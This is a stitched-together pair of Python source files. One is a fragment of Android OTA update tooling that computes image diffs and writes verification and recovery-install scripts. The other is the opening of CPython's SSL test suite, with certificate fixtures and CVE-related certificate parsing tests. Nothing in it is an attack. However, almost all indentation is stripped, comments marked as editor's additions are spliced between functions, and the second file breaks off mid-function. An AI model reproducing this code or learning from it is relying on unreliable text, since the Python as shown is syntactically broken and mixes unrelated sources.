module = None
def __init__(self, **kwargs):
"""Keyword arguments to the constructor become attributes of this
object, which is passed to all functions in the device-specific
module."""
for k, v in kwargs.iteritems():
setattr(self, k, v)
self.extras = OPTIONS.extras
if self.module is None:
path = OPTIONS.device_specific
if not path:
return
try:
if os.path.isdir(path):
info = imp.find_module("releasetools", [path])
else:
d, f = os.path.split(path)
b, x = os.path.splitext(f)
if x == ".py":
f = b
info = imp.find_module(f, [d])
print "loaded device-specific extensions from", path
self.module = imp.load_module("device_specific", *info)
except ImportError:
print "unable to load device-specific module; assuming none"
def _DoCall(self, function_name, *args, **kwargs):
"""Call the named function in the device-specific module, passing
the given args and kwargs. The first argument to the call will be
the DeviceSpecific object itself. If there is no module, or the
module does not define the function, return the value of the
'default' kwarg (which itself defaults to None)."""
if self.module is None or not hasattr(self.module, function_name):
return kwargs.get("default", None)
return getattr(self.module, function_name)(*((self,) + args), **kwargs)
def FullOTA_Assertions(self):
"""Called after emitting the block of assertions at the top of a
full OTA package. Implementations can add whatever additional
assertions they like."""
return self._DoCall("FullOTA_Assertions")
def FullOTA_InstallBegin(self):
"""Called at the start of full OTA installation."""
return self._DoCall("FullOTA_InstallBegin")
def FullOTA_InstallEnd(self):
"""Called at the end of full OTA installation; typically this is
used to install the image for the device's baseband processor."""
return self._DoCall("FullOTA_InstallEnd")
def IncrementalOTA_Assertions(self):
"""Called after emitting the block of assertions at the top of an
incremental OTA package. Implementations can add whatever
additional assertions they like."""
return self._DoCall("IncrementalOTA_Assertions")
def IncrementalOTA_VerifyBegin(self):
"""Called at the start of the verification phase of incremental
OTA installation; additional checks can be placed here to abort
the script before any changes are made."""
return self._DoCall("IncrementalOTA_VerifyBegin")
def IncrementalOTA_VerifyEnd(self):
"""Called at the end of the verification phase of incremental OTA
installation; additional checks can be placed here to abort the
script before any changes are made."""
return self._DoCall("IncrementalOTA_VerifyEnd")
def IncrementalOTA_InstallBegin(self):
"""Called at the start of incremental OTA installation (after
verification is complete)."""
return self._DoCall("IncrementalOTA_InstallBegin")
def IncrementalOTA_InstallEnd(self):
"""Called at the end of incremental OTA installation; typically
this is used to install the image for the device's baseband
processor."""
return self._DoCall("IncrementalOTA_InstallEnd")
class File(object):
def __init__(self, name, data):
self.name = name
self.data = data
self.size = len(data)
self.sha1 = sha1(data).hexdigest()
@classmethod
def FromLocalFile(cls, name, diskname):
f = open(diskname, "rb")
data = f.read()
f.close()
return File(name, data)
def WriteToTemp(self):
t = tempfile.NamedTemporaryFile()
t.write(self.data)
t.flush()
return t
def AddToZip(self, z, compression=None):
ZipWriteStr(z, self.name, self.data, compress_type=compression)
DIFF_PROGRAM_BY_EXT = {
".gz" : "imgdiff",
".zip" : ["imgdiff", "-z"],
".jar" : ["imgdiff", "-z"],
".apk" : ["imgdiff", "-z"],
".img" : "imgdiff",
}
class Difference(object):
def __init__(self, tf, sf, diff_program=None):
self.tf = tf
self.sf = sf
self.patch = None
self.diff_program = diff_program
def ComputePatch(self):
"""Compute the patch (as a string of data) needed to turn sf into
tf. Returns the same tuple as GetPatch()."""
tf = self.tf
sf = self.sf
if self.diff_program:
diff_program = self.diff_program
else:
ext = os.path.splitext(tf.name)[1]
diff_program = DIFF_PROGRAM_BY_EXT.get(ext, "bsdiff")
ttemp = tf.WriteToTemp()
stemp = sf.WriteToTemp()
ext = os.path.splitext(tf.name)[1]
try:
ptemp = tempfile.NamedTemporaryFile()
if isinstance(diff_program, list):
cmd = copy.copy(diff_program)
else:
cmd = [diff_program]
cmd.append(stemp.name)
cmd.append(ttemp.name)
cmd.append(ptemp.name)
p = Run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
err = []
def run():
_, e = p.communicate()
if e:
err.append(e)
th = threading.Thread(target=run)
th.start()
th.join(timeout=300) # 5 mins
if th.is_alive():
print "WARNING: diff command timed out"
p.terminate()
th.join(5)
if th.is_alive():
p.kill()
th.join()
if err or p.returncode != 0:
print "WARNING: failure running %s:\n%s\n" % (
diff_program, "".join(err))
self.patch = None
return None, None, None
diff = ptemp.read()
finally:
ptemp.close()
stemp.close()
ttemp.close()
self.patch = diff
return self.tf, self.sf, self.patch
def GetPatch(self):
"""Return a tuple (target_file, source_file, patch_data).
patch_data may be None if ComputePatch hasn't been called, or if
computing the patch failed."""
return self.tf, self.sf, self.patch
def ComputeDifferences(diffs):
"""Call ComputePatch on all the Difference objects in 'diffs'."""
print len(diffs), "diffs to compute"
# Do the largest files first, to try and reduce the long-pole effect.
by_size = [(i.tf.size, i) for i in diffs]
by_size.sort(reverse=True)
by_size = [i[1] for i in by_size]
lock = threading.Lock()
diff_iter = iter(by_size) # accessed under lock
def worker():
try:
lock.acquire()
for d in diff_iter:
lock.release()
start = time.time()
d.ComputePatch()
dur = time.time() - start
lock.acquire()
tf, sf, patch = d.GetPatch()
if sf.name == tf.name:
name = tf.name
else:
name = "%s (%s)" % (tf.name, sf.name)
if patch is None:
print "patching failed! %s" % (name,)
else:
print "%8.2f sec %8d / %8d bytes (%6.2f%%) %s" % (
dur, len(patch), tf.size, 100.0 * len(patch) / tf.size, name)
lock.release()
except Exception as e:
print e
raise
# start worker threads; wait for them all to finish.
threads = [threading.Thread(target=worker)
for i in range(OPTIONS.worker_threads)]
for th in threads:
th.start()
while threads:
threads.pop().join()
class BlockDifference(object):
def __init__(self, partition, tgt, src=None, check_first_block=False,
version=None):
self.tgt = tgt
self.src = src
self.partition = partition
self.check_first_block = check_first_block
# Due to http://b/20939131, check_first_block is disabled temporarily.
assert not self.check_first_block
if version is None:
version = 1
if OPTIONS.info_dict:
version = max(
int(i) for i in
OPTIONS.info_dict.get("blockimgdiff_versions", "1").split(","))
self.version = version
b = blockimgdiff.BlockImageDiff(tgt, src, threads=OPTIONS.worker_threads,
version=self.version)
tmpdir = tempfile.mkdtemp()
OPTIONS.tempfiles.append(tmpdir)
self.path = os.path.join(tmpdir, partition)
b.Compute(self.path)
if src is None:
_, self.device = GetTypeAndDevice("/" + partition, OPTIONS.info_dict)
else:
_, self.device = GetTypeAndDevice("/" + partition,
OPTIONS.source_info_dict)
def WriteScript(self, script, output_zip, progress=None):
if not self.src:
# write the output unconditionally
script.Print("Patching %s image unconditionally..." % (self.partition,))
else:
script.Print("Patching %s image after verification." % (self.partition,))
if progress:
script.ShowProgress(progress, 0)
self._WriteUpdate(script, output_zip)
self._WritePostInstallVerifyScript(script)
def WriteVerifyScript(self, script):
partition = self.partition
if not self.src:
script.Print("Image %s will be patched unconditionally." % (partition,))
else:
ranges = self.src.care_map.subtract(self.src.clobbered_blocks)
ranges_str = ranges.to_string_raw()
if self.version >= 3:
script.AppendExtra(('if (range_sha1("%s", "%s") == "%s" || '
'block_image_verify("%s", '
'package_extract_file("%s.transfer.list"), '
'"%s.new.dat", "%s.patch.dat")) then') % (
self.device, ranges_str, self.src.TotalSha1(),
self.device, partition, partition, partition))
else:
script.AppendExtra('if range_sha1("%s", "%s") == "%s" then' % (
self.device, ranges_str, self.src.TotalSha1()))
script.Print('Verified %s image...' % (partition,))
script.AppendExtra('else')
# When generating incrementals for the system and vendor partitions,
# explicitly check the first block (which contains the superblock) of
# the partition to see if it's what we expect. If this check fails,
# give an explicit log message about the partition having been
# remounted R/W (the most likely explanation) and the need to flash to
# get OTAs working again.
if self.check_first_block:
self._CheckFirstBlock(script)
# Abort the OTA update. Note that the incremental OTA cannot be applied
# even if it may match the checksum of the target partition.
# a) If version < 3, operations like move and erase will make changes
# unconditionally and damage the partition.
# b) If version >= 3, it won't even reach here.
script.AppendExtra(('abort("%s partition has unexpected contents");\n'
'endif;') % (partition,))
def _WritePostInstallVerifyScript(self, script):
partition = self.partition
script.Print('Verifying the updated %s image...' % (partition,))
# Unlike pre-install verification, clobbered_blocks should not be ignored.
ranges = self.tgt.care_map
ranges_str = ranges.to_string_raw()
script.AppendExtra('if range_sha1("%s", "%s") == "%s" then' % (
self.device, ranges_str,
self.tgt.TotalSha1(include_clobbered_blocks=True)))
# Bug: 20881595
# Verify that extended blocks are really zeroed out.
if self.tgt.extended:
ranges_str = self.tgt.extended.to_string_raw()
script.AppendExtra('if range_sha1("%s", "%s") == "%s" then' % (
self.device, ranges_str,
self._HashZeroBlocks(self.tgt.extended.size())))
script.Print('Verified the updated %s image.' % (partition,))
script.AppendExtra(
'else\n'
' abort("%s partition has unexpected non-zero contents after OTA '
'update");\n'
'endif;' % (partition,))
else:
script.Print('Verified the updated %s image.' % (partition,))
script.AppendExtra(
'else\n'
' abort("%s partition has unexpected contents after OTA update");\n'
'endif;' % (partition,))
def _WriteUpdate(self, script, output_zip):
ZipWrite(output_zip,
'{}.transfer.list'.format(self.path),
'{}.transfer.list'.format(self.partition))
ZipWrite(output_zip,
'{}.new.dat'.format(self.path),
'{}.new.dat'.format(self.partition))
ZipWrite(output_zip,
'{}.patch.dat'.format(self.path),
'{}.patch.dat'.format(self.partition),
compress_type=zipfile.ZIP_STORED)
call = ('block_image_update("{device}", '
'package_extract_file("{partition}.transfer.list"), '
'"{partition}.new.dat", "{partition}.patch.dat");\n'.format(
device=self.device, partition=self.partition))
script.AppendExtra(script.WordWrap(call))
def _HashBlocks(self, source, ranges): # pylint: disable=no-self-use
data = source.ReadRangeSet(ranges)
ctx = sha1()
for p in data:
ctx.update(p)
return ctx.hexdigest()
def _HashZeroBlocks(self, num_blocks): # pylint: disable=no-self-use
"""Return the hash value for all zero blocks."""
zero_block = '\x00' * 4096
ctx = sha1()
for _ in range(num_blocks):
ctx.update(zero_block)
return ctx.hexdigest()
# TODO(tbao): Due to http://b/20939131, block 0 may be changed without
# remounting R/W. Will change the checking to a finer-grained way to
# mask off those bits.
def _CheckFirstBlock(self, script):
r = rangelib.RangeSet((0, 1))
srchash = self._HashBlocks(self.src, r)
script.AppendExtra(('(range_sha1("%s", "%s") == "%s") || '
'abort("%s has been remounted R/W; '
'reflash device to reenable OTA updates");')
% (self.device, r.to_string_raw(), srchash,
self.device))
DataImage = blockimgdiff.DataImage
# map recovery.fstab's fs_types to mount/format "partition types"
PARTITION_TYPES = {
"yaffs2": "MTD",
"mtd": "MTD",
"ext4": "EMMC",
"emmc": "EMMC",
"f2fs": "EMMC",
"squashfs": "EMMC"
}
def GetTypeAndDevice(mount_point, info):
fstab = info["fstab"]
if fstab:
return (PARTITION_TYPES[fstab[mount_point].fs_type],
fstab[mount_point].device)
else:
raise KeyError
def ParseCertificate(data):
"""Parse a PEM-format certificate."""
cert = []
save = False
for line in data.split("\n"):
if "--END CERTIFICATE--" in line:
break
if save:
cert.append(line)
if "--BEGIN CERTIFICATE--" in line:
save = True
cert = "".join(cert).decode('base64')
return cert
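# Hedged usage sketch (editor's addition): ParseCertificate() returns the raw
# DER bytes of the first certificate found in a PEM blob. The path below is
# hypothetical.
def _example_parse_certificate():
  with open("build/target/product/security/testkey.x509.pem") as f:
    return ParseCertificate(f.read())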
def MakeRecoveryPatch(input_dir, output_sink, recovery_img, boot_img,
info_dict=None):
"""Generate a binary patch that creates the recovery image starting
with the boot image. (Most of the space in these images is just the
kernel, which is identical for the two, so the resulting patch
should be efficient.) Add it to the output zip, along with a shell
script that is run from init.rc on first boot to actually do the
patching and install the new recovery image.
recovery_img and boot_img should be File objects for the
corresponding images. info_dict should be the dictionary returned by
common.LoadInfoDict() on the input target_files.
"""
if info_dict is None:
info_dict = OPTIONS.info_dict
diff_program = ["imgdiff"]
path = os.path.join(input_dir, "SYSTEM", "etc", "recovery-resource.dat")
if os.path.exists(path):
diff_program.append("-b")
diff_program.append(path)
bonus_args = "-b /system/etc/recovery-resource.dat"
else:
bonus_args = ""
d = Difference(recovery_img, boot_img, diff_program=diff_program)
_, _, patch = d.ComputePatch()
output_sink("recovery-from-boot.p", patch)
try:
# The following GetTypeAndDevice()s need to use the path in the target
# info_dict instead of source_info_dict.
boot_type, boot_device = GetTypeAndDevice("/boot", info_dict)
recovery_type, recovery_device = GetTypeAndDevice("/recovery", info_dict)
except KeyError:
return
sh = """#!/system/bin/sh
if ! applypatch -c %(recovery_type)s:%(recovery_device)s:%(recovery_size)d:%(recovery_sha1)s; then
applypatch %(bonus_args)s %(boot_type)s:%(boot_device)s:%(boot_size)d:%(boot_sha1)s %(recovery_type)s:%(recovery_device)s %(recovery_sha1)s %(recovery_size)d %(boot_sha1)s:/system/recovery-from-boot.p && log -t recovery "Installing new recovery image: succeeded" || log -t recovery "Installing new recovery image: failed"
else
log -t recovery "Recovery image already installed"
fi
""" % {'boot_size': boot_img.size,
'boot_sha1': boot_img.sha1,
'recovery_size': recovery_img.size,
'recovery_sha1': recovery_img.sha1,
'boot_type': boot_type,
'boot_device': boot_device,
'recovery_type': recovery_type,
'recovery_device': recovery_device,
'bonus_args': bonus_args}
# The install script location moved from /system/etc to /system/bin
# in the L release. Parse the init.rc file to find out where the
# target-files expects it to be, and put it there.
sh_location = "etc/install-recovery.sh"
try:
with open(os.path.join(input_dir, "BOOT", "RAMDISK", "init.rc")) as f:
for line in f:
m = re.match(r"^service flash_recovery /system/(\S+)\s*$", line)
if m:
sh_location = m.group(1)
print "putting script in", sh_location
break
except (OSError, IOError) as e:
print "failed to read init.rc: %s" % (e,)
output_sink(sh_location, sh)
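# Hedged usage sketch (editor's addition): MakeRecoveryPatch() emits its
# outputs through a caller-supplied sink. One plausible arrangement (an
# assumption, not necessarily what every caller does) is to drop the files
# under SYSTEM/ in an output zip via ZipWriteStr().
def _example_make_recovery_patch(input_dir, output_zip, recovery_img, boot_img):
  def output_sink(fn, data):
    ZipWriteStr(output_zip, "SYSTEM/" + fn, data)
  MakeRecoveryPatch(input_dir, output_sink, recovery_img, boot_img)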
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
import unittest.mock
from test import support
from test.support import import_helper
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
import socket
import select
import time
import datetime
import enum
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import sysconfig
import functools
try:
import ctypes
except ImportError:
ctypes = None
ssl = import_helper.import_module("ssl")
import _ssl
from ssl import TLSVersion, _TLSContentType, _TLSMessageType, _TLSAlertType
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
Py_DEBUG_WIN32 = Py_DEBUG and sys.platform == 'win32'
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = socket_helper.HOST
IS_OPENSSL_3_0_0 = ssl.OPENSSL_VERSION_INFO >= (3, 0, 0)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
PROTOCOL_TO_TLS_VERSION = {}
for proto, ver in (
("PROTOCOL_SSLv23", "SSLv3"),
("PROTOCOL_TLSv1", "TLSv1"),
("PROTOCOL_TLSv1_1", "TLSv1_1"),
):
try:
proto = getattr(ssl, proto)
ver = getattr(ssl.TLSVersion, ver)
except AttributeError:
continue
PROTOCOL_TO_TLS_VERSION[proto] = ver
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Oct 28 14:23:16 2037 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
NOSANFILE = data_file("nosan.pem")
NOSAN_HOSTNAME = 'localhost'
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
OP_IGNORE_UNEXPECTED_EOF = getattr(ssl, "OP_IGNORE_UNEXPECTED_EOF", 0)
# Ubuntu has patched OpenSSL and changed behavior of security level 2
# see https://bugs.python.org/issue41561#msg389003
def is_ubuntu():
try:
# Assume that any reference to "ubuntu" implies an Ubuntu-like distro
# The workaround is not required for 18.04, but doesn't hurt either.
with open("/etc/os-release", encoding="utf-8") as f:
return "ubuntu" in f.read()
except FileNotFoundError:
return False
if is_ubuntu():
def seclevel_workaround(*ctxs):
""""Lower security level to '1' and allow all ciphers for TLS 1.0/1"""
for ctx in ctxs:
if (
hasattr(ctx, "minimum_version") and
ctx.minimum_version <= ssl.TLSVersion.TLSv1_1
):
ctx.set_ciphers("@SECLEVEL=1:ALL")
else:
def seclevel_workaround(*ctxs):
pass
def has_tls_protocol(protocol):
"""Check if a TLS protocol is available and enabled
:param protocol: enum ssl._SSLMethod member or name
:return: bool
"""
if isinstance(protocol, str):
assert protocol.startswith('PROTOCOL_')
protocol = getattr(ssl, protocol, None)
if protocol is None:
return False
if protocol in {
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER,
ssl.PROTOCOL_TLS_CLIENT
}:
# auto-negotiate protocols are always available
return True
name = protocol.name
return has_tls_version(name[len('PROTOCOL_'):])
@functools.lru_cache
def has_tls_version(version):
"""Check if a TLS/SSL version is enabled
:param version: TLS version name or ssl.TLSVersion member
:return: bool
"""
if version == "SSLv2":
# never supported and not even in TLSVersion enum
return False
if isinstance(version, str):
version = ssl.TLSVersion.__members__[version]
# check compile time flags like ssl.HAS_TLSv1_2
if not getattr(ssl, f'HAS_{version.name}'):
return False
if IS_OPENSSL_3_0_0 and version < ssl.TLSVersion.TLSv1_2:
# bpo43791: 3.0.0-alpha14 fails with TLSV1_ALERT_INTERNAL_ERROR
return False
# check runtime and dynamic crypto policy settings. A TLS version may
# be compiled in but disabled by a policy or config option.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
if (
hasattr(ctx, 'minimum_version') and
ctx.minimum_version != ssl.TLSVersion.MINIMUM_SUPPORTED and
version < ctx.minimum_version
):
return False
if (
hasattr(ctx, 'maximum_version') and
ctx.maximum_version != ssl.TLSVersion.MAXIMUM_SUPPORTED and
version > ctx.maximum_version
):
return False
return True
def requires_tls_version(version):
"""Decorator to skip tests when a required TLS version is not available
:param version: TLS version name or ssl.TLSVersion member
:return:
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if not has_tls_version(version):
raise unittest.SkipTest(f"{version} is not available.")
else:
return func(*args, **kw)
return wrapper
return decorator
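# Hedged usage sketch (editor's addition): requires_tls_version() is meant to
# decorate individual test methods, e.g.
#
#   class HypotheticalTLSTests(unittest.TestCase):
#       @requires_tls_version('TLSv1_3')
#       def test_needs_tls13(self):
#           ...
#
# The decorated test raises unittest.SkipTest when the version is unavailable.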
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
ignore_deprecation = warnings_helper.ignore_warnings(
category=DeprecationWarning
)
def test_wrap_socket(sock, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
if not kwargs.get("server_side"):
kwargs["server_hostname"] = SIGNED_CERTFILE_HOSTNAME
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
else:
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE, *, server_chain=True):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
elif server_cert == NOSANFILE:
hostname = NOSAN_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
if server_chain:
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
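# Hedged usage sketch (editor's addition): the typical pattern in this file
# pairs testing_context() with the ThreadedEchoServer helper defined further
# below (see test_read_write_zero()):
#
#   client_context, server_context, hostname = testing_context()
#   with ThreadedEchoServer(context=server_context) as server:
#       with client_context.wrap_socket(socket.socket(),
#                                       server_hostname=hostname) as s:
#           s.connect((HOST, server.port))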
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
ssl.OP_SINGLE_ECDH_USE
ssl.OP_NO_COMPRESSION
self.assertEqual(ssl.HAS_SNI, True)
self.assertEqual(ssl.HAS_ECDH, True)
self.assertEqual(ssl.HAS_TLSv1_2, True)
self.assertEqual(ssl.HAS_TLSv1_3, True)
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_ssl_types(self):
ssl_types = [
_ssl._SSLContext,
_ssl._SSLSocket,
_ssl.MemoryBIO,
_ssl.Certificate,
_ssl.SSLSession,
_ssl.SSLError,
]
for ssl_type in ssl_types:
with self.subTest(ssl_type=ssl_type):
with self.assertRaisesRegex(TypeError, "immutable type"):
ssl_type.value = None
with self.assertRaisesRegex(
TypeError,
"cannot create '_ssl.Certificate' instances"
):
_ssl.Certificate()
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS_CLIENT
self.assertEqual(str(proto), 'PROTOCOL_TLS_CLIENT')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
with warnings_helper.check_warnings():
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
with warnings_helper.check_warnings():
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
